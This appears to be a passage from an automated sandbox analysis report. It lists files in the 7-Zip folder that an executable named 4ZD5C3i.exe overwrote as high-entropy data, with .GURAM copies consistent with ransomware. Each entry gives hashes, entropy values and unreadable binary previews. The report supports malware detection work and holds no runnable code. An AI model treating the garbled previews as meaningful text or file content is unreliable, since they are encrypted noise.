                                                                                                                                                                                                                                                Preview:.%.%mOVP!v..{....<.X...X...th..}..hL.R3rFX..s..t...O.S-~.K....d.j...M..].6Gr......N..\.KS.L..j.p...u...G.6*?..W.lwN..]p..6l..zL....@|...0.?mS;.i.w........f..^...{.c*....$..."..HWr.....\p!=.I$.RM...e..H.K.).P....[j.1).n...O.f....K7..h.M...@.(....u..u..+Y..Pr~.@..V0.cg9...K&`&.E....?QkZ#Qik...m5z6xD...u.p.3.{.%..nTox..(k>.y.dC.....67...#...`.8.1...EtF.....A~...&.q...J.,4D.....J4...6f...5T@D....OUZc.:..E..6..D..[.;.f../i...iL....'......u.x.-k.q....#H..n..4..s..jv.Dx...L....x...&..........>.....R$F..l)M...x..$.R2...U.#.j...a..u$.{.Z..Q.r...`...I..~..?.<w...X.v...e..K$'.SR,..r.p..z P3.Pg..D^.d.-.q..N...8...<l7..=...*.zE.\.........s.j.....!n44....&.a....i..r.x.N.........|x.9.vKC..MO.......Cj..._.rW.Q{.J.X......LM).J....7...x...J.I......../k..j...U...#.9......'...W..Ic.[.D&....E0..!e.....\{....&j.\.Q4H...u.X....<V.7..(..V....h 3...X.o.`.....F.>j@.>\........ki..-...q.....^.F..-.....2...4.-.3.@$...X4.......;d.k...AyAh4.d.d.NA.rU...S.......d...A...

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\yo.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):11572
                                                                                                                                                                                                                                                Entropy (8bit):7.9838822018638655
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:aha7Z13wxG8JucUNAkMFiS6EsoDQr2QLs8T1YghVthSnYzBSc/AzU0/8AmXRk1IH:bN1AxSzNAVFD6eD+/P3DSnYzBbA40EAi
                                                                                                                                                                                                                                                MD5:9CA2FDBCD0AEFFDFBE9F9F636EAC355A
                                                                                                                                                                                                                                                SHA1:B8404ECA680E2C80D1A2C4BA8691282888340ACD
                                                                                                                                                                                                                                                SHA-256:E771113279F05BF7B93E3EFDD47B3653B2F4A13990FBCAA07C105F3800DDAC37
                                                                                                                                                                                                                                                SHA-512:F4A660898CC8AA302B2F7EED01E46F0BFB5B8D6FE5FBAB2069C04204210A8BA52E568F9C2F08101A02534C96863F04017ED5D325B5F1042EA70DC02E74BB33FF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:b.D..e..[...A"....p..X...-..0.....y.._....+3..z...TX...............6...H...K.2.gik?.......LA...k.l....I.9.?....$.=.[#...2._'.w..../.....|...A.jj.`w.....Na.\..?.f.l.U)n..~.#%....`.np..r%i.$[n...Zm...D..$...p....;4....cp.f.4..Ia.6.W.C.\.C(....`..2..f.tM..20.........59.s.%N.4.X.cF..y.......a....\..D...,<.uD..8.h.O.8...?..ujGN.[D..m'R...-........Y4.:.G.q.....(?.. ]..p.x).....j...)njU!..9._.,..Z.m...}..i.O..=..GU...[.F......E.+.7......0pS..n......!..mA..U..dE.}^.\*=[..h..gR..+hO-.&.e>..D6.mb>..?.......H.(=.....e...F.)....m...lsV. ~#.v. .....0.A..~64...?4=.+.Q!....._..q7bKZ'..4.7..bN....-.......c...f.........p{..g.&...j...l.............^B.$.7....dw...ccxV...:......t..f...B...F.e{.G4%f....V.D3....M..3..n.'...D:S.7......B..t...v.dw.XdVT.$.J4.7.K_Y..gu..r4.E..B.)X.u...:.2.......oa..#....G...I..d......K.R..fV.....q.ETHWv.,..(.5..xq.V.u...T8o..2..v4Mj..H<...l ...j}.....~...l.7.+.....~.....7.d...h....M..00..O<...:u...I0. J.EU..w.2.....Z~/.y.g.;+\...L.mm.2U

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\yo.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):11572
                                                                                                                                                                                                                                                Entropy (8bit):7.9838822018638655
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:aha7Z13wxG8JucUNAkMFiS6EsoDQr2QLs8T1YghVthSnYzBSc/AzU0/8AmXRk1IH:bN1AxSzNAVFD6eD+/P3DSnYzBbA40EAi
                                                                                                                                                                                                                                                MD5:9CA2FDBCD0AEFFDFBE9F9F636EAC355A
                                                                                                                                                                                                                                                SHA1:B8404ECA680E2C80D1A2C4BA8691282888340ACD
                                                                                                                                                                                                                                                SHA-256:E771113279F05BF7B93E3EFDD47B3653B2F4A13990FBCAA07C105F3800DDAC37
                                                                                                                                                                                                                                                SHA-512:F4A660898CC8AA302B2F7EED01E46F0BFB5B8D6FE5FBAB2069C04204210A8BA52E568F9C2F08101A02534C96863F04017ED5D325B5F1042EA70DC02E74BB33FF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:b.D..e..[...A"....p..X...-..0.....y.._....+3..z...TX...............6...H...K.2.gik?.......LA...k.l....I.9.?....$.=.[#...2._'.w..../.....|...A.jj.`w.....Na.\..?.f.l.U)n..~.#%....`.np..r%i.$[n...Zm...D..$...p....;4....cp.f.4..Ia.6.W.C.\.C(....`..2..f.tM..20.........59.s.%N.4.X.cF..y.......a....\..D...,<.uD..8.h.O.8...?..ujGN.[D..m'R...-........Y4.:.G.q.....(?.. ]..p.x).....j...)njU!..9._.,..Z.m...}..i.O..=..GU...[.F......E.+.7......0pS..n......!..mA..U..dE.}^.\*=[..h..gR..+hO-.&.e>..D6.mb>..?.......H.(=.....e...F.)....m...lsV. ~#.v. .....0.A..~64...?4=.+.Q!....._..q7bKZ'..4.7..bN....-.......c...f.........p{..g.&...j...l.............^B.$.7....dw...ccxV...:......t..f...B...F.e{.G4%f....V.D3....M..3..n.'...D:S.7......B..t...v.dw.XdVT.$.J4.7.K_Y..gu..r4.E..B.)X.u...:.2.......oa..#....G...I..d......K.R..fV.....q.ETHWv.,..(.5..xq.V.u...T8o..2..v4Mj..H<...l ...j}.....~...l.7.+.....~.....7.d...h....M..00..O<...:u...I0. J.EU..w.2.....Z~/.y.g.;+\...L.mm.2U

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\zh-cn.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8875
                                                                                                                                                                                                                                                Entropy (8bit):7.980096469775522
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:GJ5CHk1HrqWBU9wJtolj4RH4WwtMEB0AXtSlV5ipE4GonDsDHA77FexUo:EQVWBU9wA54N4LtMEBTkvCE9o4Dg77gB
                                                                                                                                                                                                                                                MD5:5AA06BB40B193DE88E2B1B94DE51D238
                                                                                                                                                                                                                                                SHA1:E7C3C6859CF1AC25D37DEDE9F0249ED817DCF03E
                                                                                                                                                                                                                                                SHA-256:A9B6D3E3F80D178099B1C0D9D2A1B65A7B2B6E00D07A6C6991F37247FBDACD29
                                                                                                                                                                                                                                                SHA-512:37646EA4A37C41028D09FA1D22C0386B000ED0C943731CF2978097F20BC52070ABCCD8A966E909891EB8A67955905DD4133440E5AC5FF76F6096CD82EAC5B85B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.?..7.....I$Ps.......[...M....(....9..S.....@.<b.q....+....`h`...)...;...,..*...GXR..P"....j6z......Tfz..~.._....y/..n.2...\..-.p.h.V...........9..s.....p......[.2.......w.K......1B...+.?.C.......j!;.I......iuaN}.v.Hib...T.JSp.=Z.,I. .$..b..~...W.(..b..I#+y-...^f....*...c.u...3~.^#n.B.........uY.....qX.@;.q..f*ZD.f.FM..@..%'....j.....H...,.08...wE.aB/.b3.Dh..^.YJ.+.B~.../.9S-...q.u..lCI....".....(..syr[..0cZ&...3$...m..{>..b.2..Ag... .OA>...$.......&....(..<....E.a+,...........A...G..6.....X..b....u...\`k0....zjpj..e...>...9u..-..]gj..`$.tyF......xh...3T6(....R.rr.._..=.xK,a.i.R...B.$oc..P.8}........<C...X_......H...P...|...x4.;.NH..%V._....[..RR...k...Fn]..4.e......<.....]=,...a...N.e.i0;~.9.........e......A.fW.WN.Xy..9G|U..{.....`..@....}.n...7.....2)4.'..'.(.4Zg..nGPb....8fj...X..@\.Q...`.V...k..$..XK~..l.[....>..Y(.KE..h..!..A..-...9.z...%....+.Rg...J.G<R6(...&.q87sF&.h.....S|.H..._..Te..9.OW...tt-.OJ..[r..X~.....#.V:...V..c.....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\zh-cn.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8875
                                                                                                                                                                                                                                                Entropy (8bit):7.980096469775522
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:GJ5CHk1HrqWBU9wJtolj4RH4WwtMEB0AXtSlV5ipE4GonDsDHA77FexUo:EQVWBU9wA54N4LtMEBTkvCE9o4Dg77gB
                                                                                                                                                                                                                                                MD5:5AA06BB40B193DE88E2B1B94DE51D238
                                                                                                                                                                                                                                                SHA1:E7C3C6859CF1AC25D37DEDE9F0249ED817DCF03E
                                                                                                                                                                                                                                                SHA-256:A9B6D3E3F80D178099B1C0D9D2A1B65A7B2B6E00D07A6C6991F37247FBDACD29
                                                                                                                                                                                                                                                SHA-512:37646EA4A37C41028D09FA1D22C0386B000ED0C943731CF2978097F20BC52070ABCCD8A966E909891EB8A67955905DD4133440E5AC5FF76F6096CD82EAC5B85B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.?..7.....I$Ps.......[...M....(....9..S.....@.<b.q....+....`h`...)...;...,..*...GXR..P"....j6z......Tfz..~.._....y/..n.2...\..-.p.h.V...........9..s.....p......[.2.......w.K......1B...+.?.C.......j!;.I......iuaN}.v.Hib...T.JSp.=Z.,I. .$..b..~...W.(..b..I#+y-...^f....*...c.u...3~.^#n.B.........uY.....qX.@;.q..f*ZD.f.FM..@..%'....j.....H...,.08...wE.aB/.b3.Dh..^.YJ.+.B~.../.9S-...q.u..lCI....".....(..syr[..0cZ&...3$...m..{>..b.2..Ag... .OA>...$.......&....(..<....E.a+,...........A...G..6.....X..b....u...\`k0....zjpj..e...>...9u..-..]gj..`$.tyF......xh...3T6(....R.rr.._..=.xK,a.i.R...B.$oc..P.8}........<C...X_......H...P...|...x4.;.NH..%V._....[..RR...k...Fn]..4.e......<.....]=,...a...N.e.i0;~.9.........e......A.fW.WN.Xy..9G|U..{.....`..@....}.n...7.....2)4.'..'.(.4Zg..nGPb....8fj...X..@\.Q...`.V...k..$..XK~..l.[....>..Y(.KE..h..!..A..-...9.z...%....+.Rg...J.G<R6(...&.q87sF&.h.....S|.H..._..Te..9.OW...tt-.OJ..[r..X~.....#.V:...V..c.....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\zh-tw.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8962
                                                                                                                                                                                                                                                Entropy (8bit):7.979318350557464
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:Gri9t7vFdQ17jajZ/Jp9faZIRDXggyn/rEAOAJVfiheUR:Qicjaj1Jp9iCgr/OAJVfijR
                                                                                                                                                                                                                                                MD5:762C28097917EA887CD1F88A1BEE1DBB
                                                                                                                                                                                                                                                SHA1:F36A3D6EB034403773CE81BA3DB94DF6D2CCBD26
                                                                                                                                                                                                                                                SHA-256:6842C52D13C51EA2E5E4D7F14FDD3750B44E2B053C5CE8711C0BC4139953F606
                                                                                                                                                                                                                                                SHA-512:0CF6BE378C519D5E12C0F3576D9D64937E81371455F3A21C71EF186F5F5FD4D4F6434DB4DD9477FD22C9EE487745839D514124E426F2969F6D4D1F54F4A5BBF1
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.<.S..dG.(.7...$..{iq.KE.:.m..=...P.........................Y..<.6..6..'.H..t.q...i.....z..9.G.^..3h.XDB.yJ...e..:f...4.....H.../...2.....!u...v.6....%..%l.r.SD.......j.}.'.j.......Zn.Y.w./....`...!]....R.9.......x...P..(.6....z.?..N....s. ......%!R.3.m.p.\N..^&.5V..k..9..*...T..O.>...|)&V....3.p.............;.8..K..K!.n.N....\...x.5...............#...PC...p#...2^.w.jJ/$.....H...@....=..t.bm..V.\..k... .../.$..hW7O.`....<.c......p..B..+....r.H.=_..@....Prq4Ry .\+.2.[f.$~.^..j.......uJY.2*i=GUN..skQ..t..i..;U..K...NRI.....~o..4..Mos......T.4F.3$Y...^p..4..?.]=...-e...#....X...k..G^4.._.....".[.m...3O{..j.dV...8Y..Z#hK.E.^...v|L..A.5I+k..`..z....p..n.....Z.`.pz.....rr.*...8.6.E._...t.I..=...`..*.y.......FW...:..].......k..J.~..8......A...*.C..e.../dPS.*.y*...V..V.zie.j..el[.TBt.)..5>..j.`.%L$..T0v.[.p.q....Z8...}..."E.....F....=....!.1..{..[0.+..A.a.lrl6...z.......HP[.W..A&.o.R.x..U.+'G......|4....0g*I=ZxF6....7..%<...l...a.g......|.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\zh-tw.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8962
                                                                                                                                                                                                                                                Entropy (8bit):7.979318350557464
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:Gri9t7vFdQ17jajZ/Jp9faZIRDXggyn/rEAOAJVfiheUR:Qicjaj1Jp9iCgr/OAJVfijR
                                                                                                                                                                                                                                                MD5:762C28097917EA887CD1F88A1BEE1DBB
                                                                                                                                                                                                                                                SHA1:F36A3D6EB034403773CE81BA3DB94DF6D2CCBD26
                                                                                                                                                                                                                                                SHA-256:6842C52D13C51EA2E5E4D7F14FDD3750B44E2B053C5CE8711C0BC4139953F606
                                                                                                                                                                                                                                                SHA-512:0CF6BE378C519D5E12C0F3576D9D64937E81371455F3A21C71EF186F5F5FD4D4F6434DB4DD9477FD22C9EE487745839D514124E426F2969F6D4D1F54F4A5BBF1
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.<.S..dG.(.7...$..{iq.KE.:.m..=...P.........................Y..<.6..6..'.H..t.q...i.....z..9.G.^..3h.XDB.yJ...e..:f...4.....H.../...2.....!u...v.6....%..%l.r.SD.......j.}.'.j.......Zn.Y.w./....`...!]....R.9.......x...P..(.6....z.?..N....s. ......%!R.3.m.p.\N..^&.5V..k..9..*...T..O.>...|)&V....3.p.............;.8..K..K!.n.N....\...x.5...............#...PC...p#...2^.w.jJ/$.....H...@....=..t.bm..V.\..k... .../.$..hW7O.`....<.c......p..B..+....r.H.=_..@....Prq4Ry .\+.2.[f.$~.^..j.......uJY.2*i=GUN..skQ..t..i..;U..K...NRI.....~o..4..Mos......T.4F.3$Y...^p..4..?.]=...-e...#....X...k..G^4.._.....".[.m...3O{..j.dV...8Y..Z#hK.E.^...v|L..A.5I+k..`..z....p..n.....Z.`.pz.....rr.*...8.6.E._...t.I..=...`..*.y.......FW...:..].......k..J.~..8......A...*.C..e.../dPS.*.y*...V..V.zie.j..el[.TBt.)..5>..j.`.%L$..T0v.[.p.q....Z8...}..."E.....F....=....!.1..{..[0.+..A.a.lrl6...z.......HP[.W..A&.o.R.x..U.+'G......|4....0g*I=ZxF6....7..%<...l...a.g......|.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\License.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4598
                                                                                                                                                                                                                                                Entropy (8bit):7.961648557661674
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:tS+uvgN0V0vOF9rRKq7HEVG4N1UIXmEB2dkAG+UuJLbU4WcXle/:tSpvgNa5jRRb0TX9BOkf+5LaCU/
                                                                                                                                                                                                                                                MD5:7FE5153F4F732FDA14775CA6F423B61D
                                                                                                                                                                                                                                                SHA1:B92FD837D9C53C604C5ADE56FAA2D03D7D7B3FDB
                                                                                                                                                                                                                                                SHA-256:8B6C3C196F0D57E66DFAE901385CAEF7D1E2CE4BDB8DB22DEE4A32DC0DA2230E
                                                                                                                                                                                                                                                SHA-512:BB6F02D79CD3D074BD43AB0BD75E50B7D8F24A64A79143406D6ADF9FB59CD86263DA381E10EC2671B97618D781E02D7C197498A18484B4E2DC7A39CB89959E8B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Y.......mF.A..x.$s..-J.+.p..4.^..b.....OIw....h.G.B..V..917.1..I...|.....R...Xl.'../?X..|....!.Y.V...[{.]...3o.9...D|b.*.h[.p.D..5.m..W.pG..9F...cpB..V....DU..KI.RH..QE...C..e{.>....T.+..D.k.W..q.E..R..oS.,......W.p..t.D...mp...F..kdk.d.C.K|..b......9<..f.S_/..yfX&]iP.+q:2nGE...I..HK..x..m.......XJ..u.@..........v?..?../p.tC....%N....._nK&v...... :.....C .a\,b.>..!.X.Om.;. ...5.`5.O..dN....3......+.x.:....l.K..@.dQ/.Q ...z_...6g.?[sr..Q2....8P.e.P$..:.......j....@7..%..b.....*.. (.U......F..?.ouN.q.....`6...E...O]L.8v..J..8..!.8-.pk.~...(l.u.).i...2^A.#&\..0.........#.P+V?.1......@..S....7..U&. .ND.(Wmr........F....*..hq.....\...E..*..+..p9...7...m].q.^...4........%Y;.|)..R...6.....Ye..v..k..?21.....r...-../a..SW.@p.S..r..2s..'.~...S.,.....&.....Mp...".N.......G4..j#.7......+.e..z.!..&n9.M....Y...v%L....gI<.....Gs.C.b.;......2A.}.5b..5e'J..X.Q....D...$!...6.;.......;....+d........)..M...2_!.f$.x.......:..Xm#...%.Cj8dM....'..{.L..}..c.fV].....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\License.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4598
                                                                                                                                                                                                                                                Entropy (8bit):7.961648557661674
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:tS+uvgN0V0vOF9rRKq7HEVG4N1UIXmEB2dkAG+UuJLbU4WcXle/:tSpvgNa5jRRb0TX9BOkf+5LaCU/
                                                                                                                                                                                                                                                MD5:7FE5153F4F732FDA14775CA6F423B61D
                                                                                                                                                                                                                                                SHA1:B92FD837D9C53C604C5ADE56FAA2D03D7D7B3FDB
                                                                                                                                                                                                                                                SHA-256:8B6C3C196F0D57E66DFAE901385CAEF7D1E2CE4BDB8DB22DEE4A32DC0DA2230E
                                                                                                                                                                                                                                                SHA-512:BB6F02D79CD3D074BD43AB0BD75E50B7D8F24A64A79143406D6ADF9FB59CD86263DA381E10EC2671B97618D781E02D7C197498A18484B4E2DC7A39CB89959E8B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Y.......mF.A..x.$s..-J.+.p..4.^..b.....OIw....h.G.B..V..917.1..I...|.....R...Xl.'../?X..|....!.Y.V...[{.]...3o.9...D|b.*.h[.p.D..5.m..W.pG..9F...cpB..V....DU..KI.RH..QE...C..e{.>....T.+..D.k.W..q.E..R..oS.,......W.p..t.D...mp...F..kdk.d.C.K|..b......9<..f.S_/..yfX&]iP.+q:2nGE...I..HK..x..m.......XJ..u.@..........v?..?../p.tC....%N....._nK&v...... :.....C .a\,b.>..!.X.Om.;. ...5.`5.O..dN....3......+.x.:....l.K..@.dQ/.Q ...z_...6g.?[sr..Q2....8P.e.P$..:.......j....@7..%..b.....*.. (.U......F..?.ouN.q.....`6...E...O]L.8v..J..8..!.8-.pk.~...(l.u.).i...2^A.#&\..0.........#.P+V?.1......@..S....7..U&. .ND.(Wmr........F....*..hq.....\...E..*..+..p9...7...m].q.^...4........%Y;.|)..R...6.....Ye..v..k..?21.....r...-../a..SW.@p.S..r..2s..'.~...S.,.....&.....Mp...".N.......G4..j#.7......+.e..z.!..&n9.M....Y...v%L....gI<.....Gs.C.b.;......2A.}.5b..5e'J..X.Q....D...$!...6.;.......;....+d........)..M...2_!.f$.x.......:..Xm#...%.Cj8dM....'..{.L..}..c.fV].....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Uninstall.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):15456
                                                                                                                                                                                                                                                Entropy (8bit):7.9872222144401865
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:t1F/CZinkHpgcrk94rzGHkWXM0B7kmPHt/R1:fF/CZi47AEzGHrHPZR1
                                                                                                                                                                                                                                                MD5:1397CC354F5FD91320B8DE13D35C522F
                                                                                                                                                                                                                                                SHA1:67D5415D2C6D4F6AE750C3DE8992EFC78FBF851E
                                                                                                                                                                                                                                                SHA-256:B3D6FAB826B9237BEF19FFBBDC71EC4BB564EB450958D2A2295A45E4527C2CA3
                                                                                                                                                                                                                                                SHA-512:DA9379D075EA546644843695D917AC7F1D4CB773AD3C783531792D531FA1914341CA13AE4D91DDD5FD82193AC6EF6C16F7F555754F85F69EECF3B0E0D758F2B4
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:;O...H.2/#/.....*av;U.....hi.i..O *..."..]x/.h.v.^..'_...IS0....J*;..2>....2.....E4Rc.Ji.2=..XK.!.885j,C.}A...F..y.............1...y;..ds'.X..>...,....":UA.....sj[.3.PJ..2.8._...%n|.P.U.Z..c.Y...>..K?R...F.......&JT.I...vg..:.6.m.;Fs..7...p...'.2A.4..2._o.M.1...0.._....}O.J.5{nZ......50..!...5.. ......P.?:....Zp....->../B.'....[L....).......U=Yf..'Y..)...1}...b.:.0..p<"t........../.f.....7.6.3..A,[j..Q...@..k`.J.)...u.(.....3ZE.|P).MOv-..[q_....7..].R4\\....1.E( J..%.u..b..eh.S....3._.j..7).r...{&."[..qw..z..Z@..%.....c.2..Q.D....P.gq.P...{.&.y7.M3...K#...........3.-%-V....pCa...1.....k..zJ.M^...+...l.}h4.d.[..UY..[....G>...p.I..W...S.....K......=O....t...j<.J]......#.....]..Vw.j.n.....\.-l`.r. .(.X.|.....<.l.i*........c.l.Z....b...Qx..P&qA*1.f....6...K...cp.Mf!.....6....&.cX.Q...$..@.U..\Bt....f..n..wu...g....^V,FA..Q.X.\"...0j.....}..uT.td.[.,G<&Fv:..3.(...+3g.. ...u.+......./|...).d.]]..<"'.:F3C+.v5%v....vQ......gv..$Xz4oqx..E..5....b ..x.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Uninstall.exe.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):15456
                                                                                                                                                                                                                                                Entropy (8bit):7.9872222144401865
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:t1F/CZinkHpgcrk94rzGHkWXM0B7kmPHt/R1:fF/CZi47AEzGHrHPZR1
                                                                                                                                                                                                                                                MD5:1397CC354F5FD91320B8DE13D35C522F
                                                                                                                                                                                                                                                SHA1:67D5415D2C6D4F6AE750C3DE8992EFC78FBF851E
                                                                                                                                                                                                                                                SHA-256:B3D6FAB826B9237BEF19FFBBDC71EC4BB564EB450958D2A2295A45E4527C2CA3
                                                                                                                                                                                                                                                SHA-512:DA9379D075EA546644843695D917AC7F1D4CB773AD3C783531792D531FA1914341CA13AE4D91DDD5FD82193AC6EF6C16F7F555754F85F69EECF3B0E0D758F2B4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:;O...H.2/#/.....*av;U.....hi.i..O *..."..]x/.h.v.^..'_...IS0....J*;..2>....2.....E4Rc.Ji.2=..XK.!.885j,C.}A...F..y.............1...y;..ds'.X..>...,....":UA.....sj[.3.PJ..2.8._...%n|.P.U.Z..c.Y...>..K?R...F.......&JT.I...vg..:.6.m.;Fs..7...p...'.2A.4..2._o.M.1...0.._....}O.J.5{nZ......50..!...5.. ......P.?:....Zp....->../B.'....[L....).......U=Yf..'Y..)...1}...b.:.0..p<"t........../.f.....7.6.3..A,[j..Q...@..k`.J.)...u.(.....3ZE.|P).MOv-..[q_....7..].R4\\....1.E( J..%.u..b..eh.S....3._.j..7).r...{&."[..qw..z..Z@..%.....c.2..Q.D....P.gq.P...{.&.y7.M3...K#...........3.-%-V....pCa...1.....k..zJ.M^...+...l.}h4.d.[..UY..[....G>...p.I..W...S.....K......=O....t...j<.J]......#.....]..Vw.j.n.....\.-l`.r. .(.X.|.....<.l.i*........c.l.Z....b...Qx..P&qA*1.f....6...K...cp.Mf!.....6....&.cX.Q...$..@.U..\Bt....f..n..wu...g....^V,FA..Q.X.\"...0j.....}..uT.td.[.,G<&Fv:..3.(...+3g.. ...u.+......./|...).d.]]..<"'.:F3C+.v5%v....vQ......gv..$Xz4oqx..E..5....b ..x.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\descript.ion

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):974
                                                                                                                                                                                                                                                Entropy (8bit):7.780208072872998
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:EL72C4bJnzjoSQBUuaevzSjmJrc0YXUZtwsTjry:3JljhqwO44o0jZtwey
                                                                                                                                                                                                                                                MD5:1CCF08F2278FAABE6CD57903E6DE273A
                                                                                                                                                                                                                                                SHA1:822B698463A6A98C243CE4CB3FDC9BEEC7431883
                                                                                                                                                                                                                                                SHA-256:AB5983295E2C113BF2A25F02F345384F3088C14CF5078FFFB8533225409C8DB2
                                                                                                                                                                                                                                                SHA-512:0149A6D5F4F4B19B073D83C6367CA7023A3524FF0C74E4230EEF4CD9509A9496539E10008DF149E5547692A7ACC7FFEF58B13BF0377A98114972F4F17B64AE8C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
